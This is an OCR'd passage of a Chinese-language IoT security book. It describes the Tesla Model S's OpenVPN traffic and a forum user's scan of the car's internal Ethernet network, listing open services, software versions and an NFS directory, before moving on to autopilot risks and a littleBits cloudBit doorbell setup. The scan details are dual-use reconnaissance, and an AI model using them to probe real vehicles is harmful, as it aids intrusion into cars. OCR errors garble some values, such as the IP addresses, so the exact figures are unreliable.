6.3.5 ”附加 说 明和 可 轻易 实现 的 目标 


我 们 知道 Model 5 与 特 斯 拉 基 础 设施 保持 3G 连 接 。 汽 车 也 可 以 跳 到 一 个 当地 的 WiFi 网 络 ， 这 使 得 攻击 者 更 容易 拦截 从 汽车 发 送 到 特 斯 拉 的 基础 设施 的 网 络 流量 。 
OpenVPN 协 议 用 于 加 密 汽车 与 特 斯 拉 服 务 器 之 间 的 网 络 流量 ， 如 图 6-12 所 示 。 


,800 (NL wiresharkcapture 
File Edit View Go Capture Analyze Statistics Telephony Tools... internals. Hep — 


eo4md-nxa2u-eseT£l[BaaamuESUz 
Filter: v | Expression... Clear Apply Save 


No. Time Source Destination Protocol| Length] Info 


465 88.410954000 209,11. 133.29 192.168.2.5 OpenVPN 92 MessageType: P ACK Vl 
466 88.436259000  289.11.133.29 192.168.2.5 OpenVPN 92 MessageType: P ACK Vl 
467 88.451111000  289.11.133.29 192.168.2.5 OpenVPN 196 MessageType: P CONTROL Vl [Message frac 
468 88.451113000  289.11.133.29 132.168.2.5 OpenVPN 184 MessageType: P CONTROL Vl [Message frac 
469 88.451200000  209.11.133.29 192.168.2.5 OpenVPN 184 MessageType: P CONTROL Vl [Message frac 


47188.454483000 192.168.2.5 209.11.133.29 OpenVPN 92 MessageType: P ACK Vl 
472 88.455926000 192.168.2.5 2809.11.133.29 OpenVPN 92 MessageType: P ACK VL 
473 88.456363000 192.168.2.5 209. 11. 133.29 OpenVPN 92 MessageType: P ACK Vl 
474 88.457454000 192.168.2.5 289.11.133.29 OpenVPN 92 MessageType: P ACK Vl 
475 88.552605000 209.11. 133.29 192.168.2.5 OpenVPN 184 MessageType: P_CONTROL_V1 [Message frac 
476 88.555429000 192.168.2.5 209.11. 133.29 OpenVPN 92 MessageType: P ACK Vl 
477 88.566122000  289.11.133.29 192.168.2.5 OpenVPN 184 MessageType: P CONTROL Vl [Message frac 
478 88.570343000 192.168.2.5 289.11.133.29 OpenVPN 92 MessageType: P ACK Vl 
479 88.581057000 209.11. 133.29 192.168.2.5 OpenVPN 184 MessageType: P CONTROL Vl [Message frac... 
480 88.583865000 192.168.2.5 289.11.133.29 OpenVPN 92 MessaqeType: P ACK V1 t 

3 J> 

b Frame 478: 184 bytes on wire (1472 bits), 184 bytes captured [1472 bits] on interface O 

b Ethernet II, Src: 856:38:35:b5:37:64 (85:38:35:b5:37:64), Dst: Parrot ed:99:4e (90:03:b7: ed: 99: 4e) 

b Internet Protocol Version 4, Src: 209.11.133.29 (299.11.133.29], Dst: 192.168.2.5 (192.168.2.5) 

b User Datagram Protocol, Src Port: openvpn (1194), Dst Port: 46096 (46096] 

b OpenVPN Protocol, üpcode: P CONTROL V1, Key ID: 0 


0000 90 83 b7 ed 99 4e 86 38 35 b5 37 64 08 00 45 00 
0010 200 aa 00 00 40 090 31 11 30 6d dl Ob 85 1d cO a8 
0020 02 05 04 aa b4 10 00 96 6c 35 20 d2 9b Oa c3 99 
0030 25 36 5c 09 ab 35 fO d9 4e 51 b5 2* 39 16 Sb 16 — *6X..5 
0040 f9 c2 04 Oc 38 6f Oc O0 00 00 89 53 30 92 dd 00 


& *! [File: "IUsers/apple/Docume . Packets: 939373. Displaved: 939373 000.03) - Droppe... 1Profile: Default 


图 6-12: 43d Model S 在 WiFi 环 境 下 向 外 通信 的 网 络 数 据 采集 


在 本 章 的 前 一 部 分 ， 我 们 看 到 加 州 大 学 圣迭戈 分 校 和 华盛顿 大 学 的 研究 人 员 是 如 何 利用 汽车 应 答 来 电 代 蔡 与 一 个 可 信 的 目的 地 进行 输出 通信 这 一 条 件 的 。 特 斯 拉 使 用 
OpenVPN 发 起 一 个 输出 连接 到 已 知 服务 器 是 更 安全 的 ， 然 而 这 一 领域 有 待 进一步 研究 ， 详 细 的 配置 分 析 可 能 会 进一步 揭示 安全 和 隐私 问题 。 使 用 OpenVPN 的 输出 连接 可 以 
配置 使 用 预 共 享 密 钥 、 用 户 名 和 密码 ， 或 证 书 。 看 看 这 个 信息 位 于 内 部 文件 系统 的 什么 位 置 ， 这 很 有 趣 。 一 旦 获得 这 个 信息 ， 潜 在 的 入 侵 者 可 以 测试 OpenVPN 端 点 的 内 部 网 
络 基 础 设施 ， 以 及 软件 升级 是 如 何 进行 的 完整 过 程 


除了 3G 和 WiFi 连 接 ，Model 在 仪表 板 左 侧 有 4 针 的 连接 器 : 一 个 M12 转 RJ45 适 配器 ， 这 个 端口 用 于 连接 笔记 本 电脑 。 插 入 它 之 后 ， 用 户 可 以 在 特 斯 拉 汽 车 俱乐部 论坛 报 
告 各 种 类 型 的 内 部 网 络 信息 ， 如 图 6-13 所 示 。 


Successful connection on the Model S internal Ethernet network 


www.teslamotorsclub.com / 


Successful connection on the Model S internal Ethernet network 


Almost everyone knows that there is a white 4 pin connector on the left of the dashboard 9 


Jul 2013 


Nantes, Franoe Today I susscefully connected to this connector, with a 2 row 4 contact male header (2mm pitch) 
458 


The ethernet network of the car contains 3 peripherals : 
- The center console, IP Address 192.168.90.100 
* The dashboard/navigation screen, IP Address 192.168.90.101 


图 6-13: 论坛 上 关于 特 斯 拉 Model S 内 部 网 络 的 讨论 
通过 RJ45 接 头 连接 后 扫描 内 部 网 络 ， 在 Model S 中 发 现存 在 下 面 的 IP 地 址 和 服务 : 


“IP 地 址 为 192.168.90.100 的 中 心 控制 台 和 以 下 开放 的 服务 : 


22/tcp open ssh 
53/tcp open domain 
80/tcp open http 
111/tcp open rpcbind 
2049/tcp open nfs 
6000/tcp open X11 


“IP 地 址 为 192.168.90.101 的 仪表 盘 显 示 屏 和 以 下 打开 的 服务 : 


22/tcp open ssh 
111/tcp open rpcbind 
6000/tcp open X11 


MAC Address: 36:C4:1F:2A:xx:xx (Unknown) 


- 另 一 个 IP 地 址 为 192.168.190.102 的 设备 具有 下 列 打 开 的 服务 : 


23/tcp open telnet 
1050/tcp open java-or-OTGfileshare 
MAC Address: 00:00:A7:01:xx:xx (Network Computing Devices) 


用 户 还 报告 了 以 下 结果 : 
- 在 192.168.90.100 的 SSH 服 务 具 有 ssh-2.0-openssh_5.5p1 标 识 Debian-4ubuntu4。 
- 在 192.168.90.100 的 DNS 服务 版 本 为 dnsmasq-2.58。 


- 在 192.168.90.100 的 HTTP 服 务 器 ， 显 示 /nowplaying.png， 这 是 在 仪表 板 上 显示 的 相册 。 


- 在 192.168.90.100 的 NFS 服 务 显示 目录 /opt/navigon， 具 有 以 下 结构 : 


dr-xr-xr-x 5 1111 1111 4096 Mar 21 2013 . 

drwxrwxrwt 20 root root 20480 Mar 18 17:01 http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16123/OEBPS/Text/.. 
dr-xr-xr-x 4 1111 1111 4096 Mar 21 2013 EU (Contains /maps and /data) 

dr-xr-xr-x 2 1111 1111 4096 Mar 21 2013 lost+found 

-r--r--r-- 1 1111 1111 7244 Mar 21 2013 MD5SUM-ALL 

dr-xr-xr-x 2 1111 1111 4096 Mar 21 2013 sound 

-r--r--r-- 1 1111 1111 150 Mar 21 2013 VERSION 


/NERSION: 
UI/rebase/5.0-to-master-238-9g734c31d7,EU 
NTQ312 EU,14.9.1 RC1 sound.tgz 
build/upgrade/mknav-EU-ext3.sh 


有 趣 的 是 ， 在 Model s 内 部 IP 网 络 包含 IP 地 址 ， 似 乎 运行 的 是 Linux 操 作 系统 (Ubuntu) . 


目前 还 没有 公开 报道 这 些 服务 被 滥用 。 然 而 ， 这 个 信息 是 值得 一 提 的 ， 因 为 它 让 我 们 看 到 Model S 采 用 基于 IP 的 体系 结构 。 很 可 能 其 他 研究 人 员 以 及 恶意 团体 将 被 这 个 基 
于 IP 的 内 部 网 络 所 吸引 ， 开 始 研究 还 未 被 发 现 的 潜在 攻击 途径 和 漏洞 。 


6.3.0 ”自动 驾驶 仪 和 自动 驾驶 汽车 
2014 年 10 月 ， 特 斯 拉 宣布 所 有 新 Model 汽车 将 包含 硬件 自动 沟 驶 功能 ， 未 来 几 个 月 通过 软件 更 新 发 布 并 提供 多 种 安全 功能 〈 其 他 汽车 也 有 类 似 的 功能 ， 但 是 ， 我 们 将 
针对 特 斯 拉 分 析 ， 因 为 Model S 是 我 们 关注 的 焦点 ) 。 这 里 是 特 斯 拉 的 描述 : 


此 次 发 布 双 电机 Model S 之 际 ， 推 出 一 个 具有 自动 驾驶 功能 的 标准 硬件 组 件 。 现 在 每 一 辆 出 厂 的 Model S 包 括 一 个 前 置 雷达 ，12 个 长 距 超 声波 传感器 能 在 任何 速度 下 感知 汽 
车 各 个 方向 上 16 英 尺 内 的 物体 ， 一 个 前 置 摄像 头 ， 一 个 高 精度 数控 电子 辅助 刹车 系统 。 


未 来 基于 这 一 硬件 的 软件 版 本 中 ， 我 们 将 提供 一 系列 的 主动 安全 功能 ， 发 动机 、 刹 车 和 转向 采用 数控 来 避让 前 方 或 侧面 的 撞击 或 车 道 偏离 。 


Model S 有 和 车道 保持 功能 ， 简 单 点 一 下 转向 灯 就 能 变换 车 道 ， 通 过 识别 道路 标志 来 控制 车 速 ， 使 用 主动 交通 感知 巡航 控制 。 


特 斯 拉 谨 慎 地 指出 ， 这 个 功能 不 是 完全 自主 的 : 


我 们 推出 这 种 新 的 硬件 和 软件 的 目标 不 是 实现 无 人 驾驶 汽车 ， 那 仍 需 要 许多 年 才能 成 为 现实 。 我 们 的 系统 称 为 自动 驾驶 仪 ， 因 为 它 与 飞行 员 使 用 的 系统 类 似 ， 当 条 件 允 许 
时 可 以 增加 舒适 度 和 安全 性 。 特 斯 拉 的 自动 驾驶 仪 是 一 种 缓解 驾驶 枯燥 乏味 以 及 降低 潜在 风险 的 行驶 方式 ,但 最 终 驾 驶 员 仍 要 负责 控制 汽车 。 


总 结 如 下 : 


自动 驾驶 仪 开 辟 了 令 人 振奋 的 长 远 的 可 能 性 。 想 象 一 下 ， 你 的 车 早上 查看 你 的 行程 安排 (软件 6.0 引 入 的 功能 ) ， 根 据 交 通 数据 计算 第 一 个 会 面 的 行程 时 间 ， 通 过 Homelink 
打开 车 库 门 ， 小 心 倒 出 狭窄 的 车 库 并 停 在 门口 等 待 你 出 行 。 当 然 ， 它 还 能 根据 你 的 喜好 调节 车 内 温度 并 为 你 选 好 早 间 新 闻 。 


这 些 新 功能 都 相当 精彩 ， 并 可 能 在 驾驶 员 走 神 的 时 候 减 少 事故 的 发 生 。 很 明显 ， 自 动 驾驶 仪 能 引领 我 们 走向 周围 全 是 完全 自动 驾驶 汽车 的 未 来 ， 事 实 上 ,一 些 公司 (包括 
谷歌 ) 已 经 在 研发 完全 自动 驾驶 汽车 ， 这 些 车 甚至 没有 方向 盘 。 展 望 未 来 ， 新 的 风险 可 能 被 带 到 汽车 安全 生态 系统 中 ， 其 分 析 结 果 将 是 引人入胜 的 : 


法 律 优先 和 责任 


特 斯 拉 上 明确 提 到 ， 驾 驶 员 是 “对 汽车 负责 ， 并 最 终 在 控制 汽车 。” 未 来 ， 当 我 们 进入 完全 自动 驾驶 ， 损 失 和 事故 责任 由 哪 一 方 来 承担 这 一 问题 将 会 很 有 趣 。 由 硬件 或 软件 
错误 导致 的 事故 责任 该 由 汽车 公司 来 承担 吗 ” 法 律 条 款 结合 事故 实际 具体 情况 将 形成 我 们 对 最 终 责任 的 认定 意见 ， 然 而 ， 不 同 国家 和 地 区 的 法 律 差 异 将 使 情况 变 得 复杂 。 


软件 缺陷 的 影响 


作为 消费 者 ， 在 生活 中 的 某 些 时 刻 我 们 都 遇 到 过 软件 故障 的 情况 ， 这 可 能 会 干扰 网 上 购物 ， 无 法 访问 电子 邮件 ， 或 是 无 法 打印 登 机 牌 。 现 在 想象 一 下 ， 如 果 自 动 驾 驶 仪 的 
一 个 软件 功能 故障 ， 可 能 导致 实际 的 车 道 变 更 。 这 样 的 故障 会 对 该 汽车 和 附近 的 汽车 乘客 造成 有 形 的 影响 ， 很 可 能 导致 人 身 伤害 。 


车 辆 通信 


当 消 费 汽车 变 成 真正 的 自动 驾驶 ， 他 们 将 需要 实现 一 个 对 等 的 通信 协议 ， 人 允许 附近 的 汽车 拐弯 ， 管 理 车 流量 ， 并 提醒 其 他 车 辆 道路 状况 。 在 这 一 行 如 今 有 两 个 流行 语 尝试 
捕捉 到 这 种 需求 : V2V (车 辆 到 车 辆 ) 和 V21 (车 辆 到 基础 设施 ) 。V2V 和 V2 的 组 合 通 常 被 称 为 V2X。 美 国运 输 部 DOT) 和 美国 国家 公路 交通 安全 管理 局 (NHTSA) 已 经 
建立 了 一 个 网 站 ， 宣 布 即将 提出 的 法 律 自动 驾驶 汽车 制造 商 将 有 望 有 法 可 依 。 随 着 越 来 越 多 的 车 辆 开始 相互 通信 ， 以 及 和 政府 提供 的 基础 设施 通信 (例如 管理 交通 和 收 通行 
费 ) ， 恶 意 实体 能 够 获得 的 攻击 面 将 增加 。 为 回应 政府 的 规定 ， 汽 车 制造 商 打算 设计 解决 方案 ， 并 首次 包含 安全 漏洞 。 美 国 国家 公路 交通 安全 局 已 经 展开 一 个 关于 如 何 安全 地 
实现 V2V 通 信 系 统 提案 并 从 行业 获得 反馈 信息 ， 并 意识 到 这 个 攻击 范围 将 吸引 广泛 的 参与 者 ， 如 软 硬 件 开发 人 员 、 恶 作 剧 者 、 单 一 民族 国家 ， 以 及 从 事 恐 怖 活动 的 组 织 等 。 


特 斯 拉 Model S 是 优秀 的 汽车 、 伟 大 的 创新 产品 。 但 特 斯 拉 和 其 他 连接 的 汽车 的 车 主 越 来 越 依赖 信息 安全 来 保护 他 们 所 爱 的 人 和 财产 安全 。 鉴 于 这 个 话题 的 严肃 性 ， 我 们 
知道 不 能 再 尝试 采用 过 去 在 家 中 通过 依靠 静态 口令 和 可 信 网 络 确 保 工作 站 安全 的 方式 来 保护 我 们 的 车 辆 。 在 这 种 情况 下 的 物理 安全 和 隐私 的 含义 已 经 加 大 困难 到 了 一 个 新 的 水 
x. 


特 斯 拉 在 创新 方面 表现 出 跳跃 式 的 发 展 ， 这 势必 会 激发 其 他 汽车 制造 商 的 灵感 。 希 望 本 章 能 鼓励 车 主 们 对 自己 的 部 分 内 容 进 行 深入 思考 ， 并 鼓励 像 特 斯 拉 这 样 的 公司 与 客 
户 之 间 有 个 开放 性 的 对 话 ， 告 知 他 们 如 何 认真 对 待 安全 问题 。 


[1 马力 一 735.499 瓦 。 


[中 1 英里 二 1609.344 米 。 


6.4 小 结 


对 我 们 许多 人 来 说 ， 生 活 中 依赖 汽车 是 毋庸 置 疑 的 。 但 是 ， 除 了 我 们 控制 自己 的 车 辆 ， 我 们 还 依赖 于 其 他 司机 的 驾驶 能 力 ， 以 及 他 们 所 驾驶 汽车 的 安全 功能 。 在 本 章 中 ， 
我 们 已 经 探讨 了 汽车 设计 的 安全 机 制 ， 即 使 用 和 依赖 无 线 通信 来 支持 保障 隐私 和 安全 特性 ， 这 对 乘客 来 说 很 重要 。 


在 分 析 TPMSs 的 例子 中 ， 显 而 易 见 的 是 基本 的 安全 设计 原则 并 没有 融入 到 体系 结构 设计 中 。 它 有 可 能 向 附近 的 汽车 发 送 虚假 的 轮胎 压力 警报 ， 并 利用 这 个 系统 的 设计 跟踪 
特定 的 车 辆 ， 从 而 侵犯 公民 的 隐私 ， 这 些 人 可 能 甚至 不 知道 他 们 的 车 使 用 不 安全 的 机 制 来 传输 轮胎 压力 数据 ， 这 非常 令 人 惊讶 。 


远程 接管 车 辆 的 远程 信息 处 理 控制 单元 的 能 力也 令 人 惊讶 。 我 们 已 经 看 到 ，CAN 总 线 架 构 明确 信任 网 络 中 的 每 个 信息 处 理 单 元 ， 所 以 一 个 简单 成 功 的 蜂窝 网 络 攻击 就 可 能 
是 致命 的 (已 给 出 了 一 个 恶意 的 人 控制 汽车 的 可 能 的 过 程 ) 。 大 多 数 的 漏洞 研究 人 员 发 现 : 其 结果 是 基本 的 软件 错误 所 致 ， 如 缓冲 区 溢出 、 依 赖 不 明 、 加 密 不 当 ， 这 一 发 现 令 
人 不 安 。 


特 斯 拉 的 Model 5S 实际 上 是 一 台 轮 子 上 的 电脑 ， 全 电动 且 时 刻 与 互联 网 相连 。691 马 力 ， 这 可 能 是 一 个 能 买 到 的 最 强大 的 消费 级 物 联网 设备 。 车 主 应 注意 到 这 辆 豪华 车 除 
了 驾驶 乐趣 和 誉 为 一 辆 有 史 以 来 最 创新 的 汽车 (提供 远程 解锁 和 启动 功能 ) 之 外 ， 它 也 是 由 一 个 单一 因素 密码 系统 所 保护 的 ， 安 全 组 织 早 就 知道 其 容易 受 社会 工程 、 网 络 钓鱼 
和 恶意 软件 的 攻击 。 这 可 能 会 导致 一 种 情况 ，Model s 能 够 被 无 数 恶意 人 员 (如 恶作剧 者 或 政府 支持 的 活动 家 ) 因 各 种 动机 所 利用 。 此 外 ， 目 前 还 不 清楚 特 斯 拉 使 用 什么 样 的 
机 制 和 流程 去 防止 自己 的 员工 进行 社会 工程 攻击 并 且 保 护 车 主 的 位 置 隐私 。 


当今 市 场 上 的 汽车 软件 缺陷 问题 可 以 通过 在 产品 开发 阶段 加 强 安全 设计 和 分 析 来 缓解 。 我 们 应 当 仔 努力 修复 那些 置 我 们 的 安全 和 隐私 于 危险 中 的 问题 。 这 也 许 不 是 一 个 坏 
的 猜测 ， 如 果 我 们 现在 不 采取 相应 行动 ， 由 联网 汽车 构成 的 攻击 范围 必 将 成 倍增 加 ， 特 别 是 我 们 正 走 向 全 自动 汽车 的 时 代 。 


第 7 章 ”安全 原型 一 一 littleBits 和 cloudB it 


2007 年 ， 随 着 第 一 代 iPhone 的 发 布 ， 苹 果 公 司 单枪匹马 扰乱 了 整个 智能 手机 行业 。 从 一 个 局 外 人 的 角度 来 看 ，2007 年 公布 的 Phone 可 能 就 是 第 一 款 面向 公众 的 成 熟 产 
品 。 然 而 ， 最 初 的 设计 理念 是 最 终 要 生产 出 一 部 触摸 感应 的 平板 ， 让 用 户 远离 键盘 。 当 乔布斯 看 到 平板 电脑 的 原型 时 ， 他 就 决定 首先 在 智能 手机 上 实现 这 一 技术 。 


原型 可 以 帮助 我 们 将 智慧 集中 在 我 们 构思 产品 的 真正 意图 上 ， 帮 助 我 们 深入 考虑 我 们 思路 的 相关 性 。 创 建 原型 的 伟大 之 处 在 于 : 创建 原型 的 过 程 能 够 帮助 我 们 提前 发 现 最 
终 产品 设计 上 存在 的 潜在 缺陷 。 原 型 也 能 够 帮助 我 们 对 不 同 版 本 的 思路 进行 测试 ， 最 终 可 能 会 产生 一 个 完全 不 同 的 思路 ， 与 最 初 的 设计 完全 不 一 样 ， 比 如 苹果 和 乔布斯 的 例 


出 


有 很 多 平台 和 工具 可 以 帮助 个 人 以 最 小 的 成 本 和 努力 实现 物 联网 产品 的 创意 原型 。 本 章 ， 我 们 就 来 集中 讨论 一 下 littleBits 平 台 ， 该 平台 是 市 场 上 最 简单 最 优雅 的 原型 解决 
方案 。littleBits 中 包含 很 多 “磁性 ”模块 ， 它 们 可 以 像 乐高 积木 一 样 摆 放 在 一 起 ， 几 秒 钟 就 能 够 创建 出 一 个 原型 。 我 们 将 使 用 cloudBit 模 块 构建 一 个 简单 的 ， 可 以 通过 SMS 消 
息 发 送 报警 的 无 线 门铃 。 


当 你 完成 原型 设计 之 后 ， 我 们 来 看 看 与 littleBits 相 关 的 安全 问题 ， 这 样 我 们 就 会 了 解 到 : 在 真正 生产 之 前 的 产品 后 续 迭 代 过 程 中 ， 需 要 采取 的 安全 控制 措施 有 哪些 。 这 一 
练习 的 目的 是 模拟 厂家 都 会 经 历 的 真正 的 产品 生产 过 程 ， 从 最 初 的 产品 原型 开始 ， 这 样 我 们 就 能 够 仔细 考虑 如 何在 正确 的 时 间 点 将 安全 控制 措施 嵌入 到 产品 中 去 。 


如 何 确保 物 联网 设备 安全 ， 需 要 考虑 具体 场合 ， 比 如 如 何 使 用 产品 ， 以 及 哪 种 类 型 的 威胁 代理 会 基于 恶意 的 目的 被 使 用 。 例 如 ， 一 个 经 验 丰 富 的 恐怖 袭击 想 要 获取 和 保持 
对 用 于 关键 基础 设施 的 物 联网 设备 的 权限 访问 ， 比 如 接 入 到 汽车 或 者 照明 系统 的 物 联网 设备 。 另 一 方面 ， 类 似 于 网 霸 (cyberbully) 这 样 的 威胁 代理 是 有 可 能 利用 设备 功能 区 
去 骚扰 别人 的 。 本 章 ， 我 们 将 通过 设计 原型 来 形成 我 们 的 安全 控制 思想 ， 以 衡量 用 例 以 及 潜在 威胁 代理 的 真正 意图 。 


7.1 cloudBit Starter Kit 简 介 


cloudBit Starter Kit 是 一 款 非 常 棒 的 工具 ， 供 我 们 开始 调整 那些 需要 远程 连接 (例如 通过 互联 网 ) 的 物 联网 产品 设计 思路 。 它 是 一 款 非常 简单 和 优雅 的 工具 ， 使 用 这 款 工 
RE, 我们 不 需要 对 设备 全 面 的 解决 方案 花费 太 多 的 精力 ， 就 能 够 遍历 我 们 思路 的 所 有 可 能 性 。 工 具有 5 个 原型 模块 和 一 个 USB 电 源 模块 (如 图 7-1 所 示 ) 。 
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图 7-1: USB 电 源 模块 
USB 电 源 模块 为 cloudBit 项 目 提 供电 源 。 可 以 使 用 USB 电 缆 供 电 ， 也 可 以 使 用 一 个 插头 供电 (如 图 7-2 所 示 ) ， 两 者 在 cloudBit Starter Kit 中 都 有 提供 。 


长 LED (light emitting diode 发 光 二 极 管 ) 模块 可 用 于 提供 照明 。 名 称 中 的 “长 ”表示 它 是 捡 在 一 个 电缆 上 的 ， 可 以 将 LED 放 置 在 原型 硬件 以 及 其 他 对 象 内 部 任何 位 置 
上 。 伺 服 模块 是 一 个 控制 电机 ， 可 以 来 回 摆动 ， 也 可 以 顺 时 针 或 逆 时 针 摆动 。 声 音 触发 模块 监听 环境 中 的 噪音 水 平 ， 并 以 程序 的 方式 在 噪音 超过 预 设 阔 值 时 触发 其 他 模块 。 按 
钮 模块 (如 图 7-3 所 示 ) ， 人 如 其 名 ， 就 是 一 个 简单 的 按钮 ， 按 下 按钮 ， 激 活 其 他 模块 。 


图 7-2: USB 电 源 插 头 和 电缆 
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图 7-3: 按钮 模块 


cloudBit 模 块 (如 图 7-4 所 示 ) 显然 就 是 这 次 表演 的 明星 。 基 本 上 它 就 是 装 有 Linux 操 作 系统 的 一 台 小 计算 机 。 它 包括 了 WiFi 功 能 ， 简 单 配置 就 可 免费 接 入 littleBits 云 基础 
设施 ， 在 下 边 的 章节 我 们 会 介绍 这 些 基 础 设施 。 
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图 7-4: cloudBit 模 块 


连接 之 后 ，cloudBit 模 块 向 littleBits 云 发 送 数据 ， 远 程 应 用 程序 可 以 使 用 这 些 数据 控制 接 入 到 cloudBit 上 的 模块 。 


7.1.1 设置 CloudBit 


第 一 步 是 要 设置 cloudBit， 让 它 可 以 接 入 Wifi， 以 便 关 联 甚至 是 接 入 到 littleBits 云 基础 设施 上 。 为 了 完成 这 一 步 ， 我 们 首先 要 注册 一 个 littleBits 账 号 ， 如 图 7-5 所 示 。 


注册 账号 之 后 ， 我 们 就 可 以 到 http://control.littlebitscloud.cc 网 站 上 为 我 们 的 cloudBit 模 块 取 个 名 字 (如 图 7-6 所 示 ) 。 


为 模块 取 名 之 后 ， 网 站 要 求 我 们 启动 cloudBit (如 图 7-7 所 示 ) 。 这 时 ， 我 们 需要 将 墙 适 配器 接 入 到 USB 电 源 模块 上 ， 然 后 将 USB 电 源 模块 接 入 到 cloudBit。 
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CREATE AN ACCOUNT 


Email 


eva.lin&gmail.com 


Username 


Eva, Lin 


Password 


Password Confirmation 


| | Sign up for our newsletter for exclusive offers, new product updates, and project idecs! 


SIGN UP 


[f Sign in with Facebook 


We will never post anything on Facebook wshou! your permission 


图 7-5: 注册 littleBits 账 号 


control.littlebitscloud.cc 


SETUP: NAME 


WELCOME 


Now we will walk you through connecting your 
cloudBit to your local wifi. You will only have to do 
this once. 


SMS Door. Bell 


SAVE NAME 


What should | name my cloudBit? 


图 7-6: 为 cloudBit 模 块 取 名 


需要 注意 的 是 ，littleBits 模 块 是 有 吸附 功能 的 ， 因 而 很 容易 与 其 他 模块 连接 在 一 起 。 而 且 它们 也 区 分 颜色 。 蓝 色 模 块 是 电源 模块 ， 比 如 USB 电 源 模块 ， 用 于 为 电路 加 电 。 
红色 表示 输入 ， 这 些 模块 接收 来 自用 户 和 环境 (如 按钮 模块 ) 的 输入 信息 。 之 后 ， 这 些 模 块 将 信号 返回 给 表示 输出 的 绿色 模块 。 输 出 模块 执行 动作 (比如 伺服 电机 沿 特 定 方向 
旋转 ) 。 橙 色 模 块 是 电线 ， 用 于 延伸 项 目的 范围 。 比 如 cloudBit 模 块 ， 用 于 提供 与 远程 原型 的 连接 。 模 块 连接 的 顺序 很 重要 : 电源 模块 总 是 在 最 前 边 ， 输 入 模块 只 会 对 输出 模 
块 起 作用 ， 所 以 也 只 会 紧 跟 在 输出 模块 后 边 。 


一 旦 启动 了 cloudBit， 模 块 的 提示 灯 将 开始 闪烁 。 这 时 ， 我 们 需要 按 下 标 有 “STATUS LIGHT IS FLASHING” 的 按钮 (如 图 7-7 所 示 ) 。 


control.littlebitscloud.cc 


Cancel SETUP: STEP 1 


BOOTING UP 


Connect your cloudBit to the p3 USB power & wait 
for status light to start flashing. 


pr plug US$ cable to wall 


L. Wait f9Y Status light to Vlink / 


STATUS LIGHT IS FLASHING 


图 7-7: cloudBit5] 4- 


现在 ， 我 们 会 看 到 如 图 7-8 所 示 的 界面 。 


按照 提示 ， 按 住 “setup” 按 钮 直到 提示 灯 闪 烁 蓝 色 ， 然 后 松 开 setup 按 钮 ， 直 到 提示 灯 稳 定 的 显示 为 蓝 色 。 之 后 ， 我 们 点 击 “BLUE LIGHT IS STEADY" 按钮， 如 图 7-8 
所 示 。 这 时 ，cloudBit 将 以 littleBits Cloud (littleBits 云 ) 的 方式 启动 自己 的 WiFi 网 络 ， 我 们 可 以 连接 到 该 网 络 (如 图 7-9 所 示 ) 。 


当 我 们 连接 了 cloudBit 开 启 的 WiFi 网 络 ， 浏 览 器 就 会 定位 到 模块 上 ， 并 查询 其 他 能 够 检测 到 的 WiFi 网 络 (如 图 7-10 所 示 ) 。 


controllittiebitscloud.cc © m 


Cancel 


READY 


Hold down setup button until light blinks blue. Then 
let go and wait for light to turn steady blue. 


|. press and held setup hutton 、 


1. status lio will Hash Mot 
Weste stay steady blue 


BLUE LIGHT IS STEADY 


图 7-8: 配置 cloudBit 


ece control.littlebitscloud.ce © 由 


SWITCH YOUR COMPUTER'S WIFI TO 
"littleBits Cloud ..." 


Open your wifi preferences & choose 
"litleBits Cloud ..." from the list 


Wi-Fi: Looking for Networks 
Turn Wi-Fi Off 


v My Wifi Network 


littleBits Cloud ****** 


Join Other Network... 
Create Network... 
Open Network Preferences... 


Select Vis network 


© Waiting for you to connect to 
"littleBits Cloud ..." 


图 7-9: 连接 至 cloudBit WiFi 网 络 


control.littlebitscloud.cc 


Cancel SETUP: STEP 4 


SAVE YOUR WIFI 


Select your local wifi to connect your cloudBit. 


CHOOSE A NETWORK... 


HOME-0440 
42 
xfinitywifi 


TouchOfClass 


图 7-10: cloudBit4& 3t] WiFi [s 24 


这 时 ， 我 们 要 选择 我 们 自己 的 家 庭 WiF 网络， 本 例 中 是 TouchOfClass (如 图 7-11 所 示 ) . 


control.littiebitscloud.cc 


Networks TOUCHOFCLASS 


Password eeeeeeeeeeee 


The cloudBit needs your wifi password to 
connect to the internet. This information will not 


be shared. 
SAVE YOUR WIFI 


Select your local wifi to connect your cloudBit. 


图 7-11: 输入 WiFi 认 证 信息 


点 击 “ 保 存 ” 按钮 ， 我 们 被 要 求 连接 回 我 们 家 里 的 WiFi 网 络 (TouchOfClass) 。cloudBit 模 块 现在 就 配置 好 了 ， 可 以 连接 到 littleBits 云 基础 设施 了 。 


7.4.2 ”设计 短信 门铃 


cloudBit 模 块 配置 好 了 ， 我 们 可 以 使 用 它 来 设计 一 个 按 下 按钮 就 能 发 送 短 信 的 门铃 了 。 我 们 使 用 第 1 章 提 到 过 的 IFTTT ( (IF) 如 果 满 足 你 设 定 的 条 件 (This) ， 那 么 
(Then) ， 触 发 你 指定 的 操作 (That) ) 平台 处 理 cloudBit 和 收 到 短信 的 电话 之 间 的 交互 。 访 问 https://ifttt.com/join 网 站 ， 如 果 没 有 IFTTT 账 户 的 话 ， 先 创建 一 个 。 之 后 ， 


访问 https://ifttt.comylittlebits 网 站 激活 littleBits 通 道 。 通 道 激活 将 会 借助 littleBits 网 络 进 行 |FTTT 和 cloudBit 之 间 的 交互 认证 (如 图 7-12 所 示 ) 。 


eoe < a ifttt.com/ittlebits 


IFTTT 
littleBits Channel 


Channels 


littleBits is an open source library of electronic modules 
that snap together with magnets for prototyping, 
learning and fun. Connect your littleBits cloudBit to 
every thing on the internet! 


Activate 


图 7-12: 在 IFTTT 上 开启 littleBits 通 道 


现在 ,我 们 准备 创建 一 个 IFTTT “配方 ”， 按 下 门铃 后 ， 它 可 以 给 我 们 的 手机 发 送 短 信 消 息 。 访 问 https://ifttt.com/myrecipes/personal/new 网 站 ,创建 一 个 新 的 “ 配 
方 ”， 在 “this” 按 钮 上 点 击 ， 在 触发 器 列表 中 输入 little， 查 找 相应 的 触发 器 。 (触发 器 是 一 个 基本 的 事件 ， 用 于 触发 一 个 动作 ， 它 们 属于 IFTTT 配 方 的 “this” 部 分 ， 而 动作 
通道 (例如 : 短信 ) 是 “that”。) 在 列表 中 选择 littleBits， 当 其 他 输入 模块 (比如 按钮 模块 ) 向 cloudBit 发 送信 号 时 ， 点 击 “Input received” 就 会 运行 “配方 ”。 从 已 授 
权 的 cloudBits 中 选择 我 们 的 cloudBit， 取 名 为 SMS_Door_Bell (如 图 7-6 所 示 ) ， 然 后 点 击 创建 触发 器 (如 图 7-13 所 示 ) 。 


